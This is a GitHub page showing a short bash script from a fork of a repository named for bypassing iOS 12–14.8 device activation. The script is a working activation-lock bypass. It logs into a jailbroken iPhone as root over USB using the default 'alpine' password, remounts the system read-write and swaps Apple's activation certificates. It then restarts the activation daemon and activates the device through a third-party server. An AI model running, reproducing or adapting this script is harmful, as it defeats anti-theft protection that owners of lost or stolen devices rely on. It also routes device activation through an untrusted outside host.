forked from jacquesTech/Bypass-idevice-ios12-14.8-
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathFixiServices.sh
13 lines (13 loc) · 1.1 KB
/
FixiServices.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
#!/bin/bash
folderSystem="/System/Library/PrivateFrameworks/MobileActivation.framework/Support/Certificates";
folderDaemon="/System/Library/LaunchDaemons";
folder="/Users/$(whoami)/Desktop/tmp";
folderBin="$Folder/libs";
$folderBin/iproxy 2222 22 &>log&rm ~/.ssh/known_hosts;
$folderBin/idevicepair pair;
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'mount -o rw,union,update /';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chflags -R nouchg '$folderSystem'';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'cp -rp '$folderSystem'/FactoryActivation.pem '$folderSystem'/RaptorActivation.pem';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'launchctl unload '$folderDaemon'/com.apple.mobileactivationd.plist';
$folderBin/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'launchctl load '$folderDaemon'/com.apple.mobileactivationd.plist';
$folderBin/ideviceactivation activate -d -s https://bigb033xecution3r.com/iOS14/Activation/ActivateDevice.php;